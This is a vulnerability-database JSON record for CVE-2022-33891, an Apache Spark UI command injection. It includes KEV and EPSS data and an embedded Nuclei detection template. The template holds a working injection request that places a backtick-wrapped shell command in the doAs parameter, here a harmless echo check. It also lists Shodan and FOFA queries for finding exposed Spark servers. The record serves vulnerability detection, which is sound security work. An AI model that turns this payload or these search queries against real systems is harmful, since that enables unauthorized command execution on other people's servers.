{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-33891/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-33891/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-33891/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-33891/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-33891/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-33891"},"sightings":{"href":"/api/v1/sightings/cve-2022-33891"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.93076,"kev":true,"percentile":0.9983},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-33891.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2022-33891\n\ninfo:\n  name: Apache Spark UI - Remote Command Injection\n  author: princechaddha\n  severity: high\n  description: |\n    Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n  remediation: |\n    Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability.\n  reference:\n    - https://github.com/W01fh4cker/cve-2022-33891\n    - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc\n    - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-33891\n    - http://www.openwall.com/lists/oss-security/2023/05/02/1\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2022-33891\n    cwe-id: CWE-78\n    epss-score: 0.93076\n    epss-percentile: 0.9983\n    cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: spark\n    shodan-query:\n      - title:\"Spark Master at\"\n      - http.html:\"/apps/imt/html/\"\n      - http.title:\"spark master at\"\n    fofa-query:\n      - body=\"/apps/imt/html/\"\n      - title=\"spark master at\"\n    google-query: intitle:\"spark master at\"\n  tags: cve2022,cve,apache,spark,kev,packetstorm,vkev,vuln\nvariables:\n  command: \"echo CVE-2022-33891 | rev\"\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"19833-2202-EVC\"\n# digest: 4a0a004730450220693b6b8659f8862232d02db20dc31fdb5a0438a427aa8fd5c3f2e0df187b7684022100871c0dbcfc71fa1e3a56a83d79313bb39fd356fa7dad3e1be03ffaad98a8c016:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-33891"}